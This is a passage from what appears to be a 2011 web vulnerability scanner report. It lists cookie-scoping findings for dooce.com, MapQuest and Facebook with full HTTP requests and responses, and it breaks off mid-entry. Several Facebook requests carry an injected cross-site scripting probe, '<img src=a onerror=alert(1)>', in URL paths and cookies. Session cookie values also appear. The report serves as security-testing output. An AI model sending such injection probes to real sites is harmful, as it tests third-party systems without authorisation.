Path:   /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
Last-Modified: Thu, 05 May 2011 10:55:52 GMT
ETag: "7f0e32fa0924b70c7c5abdc1af28feda"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...

10.2. http://www.mapquest.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:03 GMT; Path=/
Set-Cookie: psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Length: 32047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...

10.3. http://www.mapquest.com/_svc/ad/getads

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/ad/getads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/ad/getads HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 732

{"request":{"pageView":"initial","userLocale":"en_US","userState":{"locations":[{"role":"mapcenter","lattitude":32.78699999999999,"longitude":-96.79900000000002}],"legs":[],"searches":[],"routeDistanc
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 464

{"data":{"parameters":{"dotcom-right-header":{"adParametersTypeString":"HTML","encodedStateHash":null,"htmlText":"","type":"HTML"},"bottom-content":{"adParametersTypeString":"UAC","adTitle":null,"adTy
...[SNIP]...

10.4. http://www.mapquest.com/_svc/apixel

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/apixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/apixel?t=jsop&i=_0&v=4&1=mq.main&2=mq%20main&3=no%20referrer&4=map%20%3A%20afarm%20%3A%20baseline&5=none&6=null&7=undefined&8=null HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: Mon, 1 Feb 2001 08:32:00 GMT
Content-Type: image/gif
Content-Length: 35
Date: Thu, 05 May 2011 00:57:10 GMT

GIF87a.............,...........D..;

10.5. http://www.mapquest.com/_svc/publishing/promo

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/publishing/promo

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/publishing/promo HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 62

{"key":"winston-site-selector","language":"en","country":"us"}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 1199

{"data":{"text":"<ul>\r\n <li><a onclick=\"m3.util.Event.publish('EventLog', {action: 'MQSITES-ROUTEPLANNER-CLICK'});\" href=\"http://www.mapquest.com/routeplanner\">Route Planner</a></li>\r\n <
...[SNIP]...

10.6. http://www.mapquest.com/_svc/searchio

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/searchio

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/searchio?action=config&locale=en_US&shapepoints=(32.93119675804705,-96.97066137694627,32.64256910519762,-96.62733862305373) HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Cache-Control: no-transform
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 101621

{"advertisers":[{"addressSummaryPrefixUrl":null,"addressSummaryTracking":[],"bannerAds":[{"height":0,"magicNumber":"93306669","type":"234x60","width":0}],"branded":true,"brandedSearchOnly":false,"clus
...[SNIP]...

10.7. http://www.mapquest.com/cdn/_uac/adpage.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /cdn/_uac/adpage.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/_uac/adpage.htm HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1171-1304454928000"
Last-Modified: Tue, 03 May 2011 20:35:28 GMT
Content-Type: text/html
Cteonnt-Length: 1171
Date: Thu, 05 May 2011 00:57:10 GMT
Content-Length: 1171

<html>
<head>
<script type='text/javascript'>
var blockedReferrer = "";
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
document.domain=dom
}

function adsPageOnL(){
var adFr=window.frameE
...[SNIP]...

10.8. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /cdn/dotcom3/images/new_purple_button.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/dotcom3/images/new_purple_button.jpg HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"660-1304454926000"
Last-Modified: Tue, 03 May 2011 20:35:26 GMT
Content-Type: image/jpeg
Content-Length: 660
Date: Thu, 05 May 2011 00:57:09 GMT

.PNG
.
...IHDR...,.........J3......tEXtSoftware.Adobe ImageReadyq.e<...6IDATx.b...?.P..C..,+'..Z.& ...~Pz .w >..w.q.1.o.b.A...@\.b0.P ....cA...=p9..7... K.8...M...as.=....RB....13...r..BbB...\..y
...[SNIP]...

10.9. http://www.mapquest.com/icons/stop.png

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /icons/stop.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/stop.png?text=A HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Last-Modified: Tue, 03 May 2011 20:35:24 GMT
Expires: Thu, 05 May 2011 01:21:10 GMT
Content-Type: image/png
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 923

.PNG
.
...IHDR.............e/O]...bIDATx....K.Q..p!.......B..H...x.LM!..m....L.i*....y...-.."...@0....YI.."J...5...wv6...[.m.e...9.....9...8....WN`Na$<t..[..0)f..5C..Y......L.TH.$.^[....
..M.{).%...
...[SNIP]...

10.10. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.11. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=hrTlo; path=/; domain=.facebook.com
  • reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/11
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=hrTlo; path=/; domain=.facebook.com
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.40.55
X-Cnection: close
Date: Thu, 05 May 2011 11:29:43 GMT
Content-Length: 11493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.12. http://www.facebook.com/10000082482078341583

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.31
Connection: close
Date: Thu, 05 May 2011 11:43:13 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.13. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.55
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 11470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.14. http://www.facebook.com/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

